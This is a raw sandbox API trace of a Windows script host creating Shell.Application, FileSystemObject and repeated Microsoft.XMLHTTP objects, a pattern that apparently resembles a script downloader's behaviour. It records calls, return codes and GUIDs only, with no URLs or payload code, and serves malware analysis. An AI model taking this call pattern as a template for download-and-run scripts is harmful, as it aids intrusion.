	[0385.590] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0385.590] SysStringLen (param_1=0x0) returned 0x0
	[0385.590] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0385.590] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0385.590] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0385.591] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0385.591] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0385.591] ??2@YAPEAX_K@Z () returned 0x62f350
	[0385.591] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0385.591] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0385.591] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0385.591] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0385.591] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0385.591] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0385.591] SysStringLen (param_1=0x0) returned 0x0
	[0385.591] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0385.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0385.593] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0385.594] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0385.594] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0385.594] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0385.594] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0386.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0386.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0386.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0386.187] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.187] SysStringLen (param_1=0x0) returned 0x0
	[0386.187] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.187] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77c0) returned 0x0
	[0386.187] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0386.187] ??2@YAPEAX_K@Z () returned 0x62f330
	[0386.187] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0386.187] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.187] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0386.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77c0) returned 0x0
	[0386.187] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77c0) returned 0x3
	[0386.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.187] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.189] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.189] SysStringLen (param_1=0x0) returned 0x0
	[0386.190] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.190] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7820) returned 0x0
	[0386.190] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0386.190] ??2@YAPEAX_K@Z () returned 0x62f310
	[0386.190] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0386.190] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.190] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0386.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7820) returned 0x0
	[0386.190] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7820) returned 0x3
	[0386.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.190] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7820, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.190] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.190] SysStringLen (param_1=0x0) returned 0x0
	[0386.190] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.191] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0386.191] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0386.191] ??2@YAPEAX_K@Z () returned 0x62f330
	[0386.191] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0386.191] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.191] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0386.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0386.191] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0386.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.191] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.191] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.191] SysStringLen (param_1=0x0) returned 0x0
	[0386.191] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.191] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0386.192] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0386.192] ??2@YAPEAX_K@Z () returned 0x62f310
	[0386.192] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0386.192] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.192] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0386.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0386.192] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0386.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.192] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.192] longjmp () 
	[0386.192] longjmp () 
	[0386.192] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.192] SysStringLen (param_1=0x0) returned 0x0
	[0386.192] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.192] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0386.192] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0386.193] ??2@YAPEAX_K@Z () returned 0x62f330
	[0386.193] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f330) 
	[0386.193] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.193] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0386.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0386.193] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0386.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
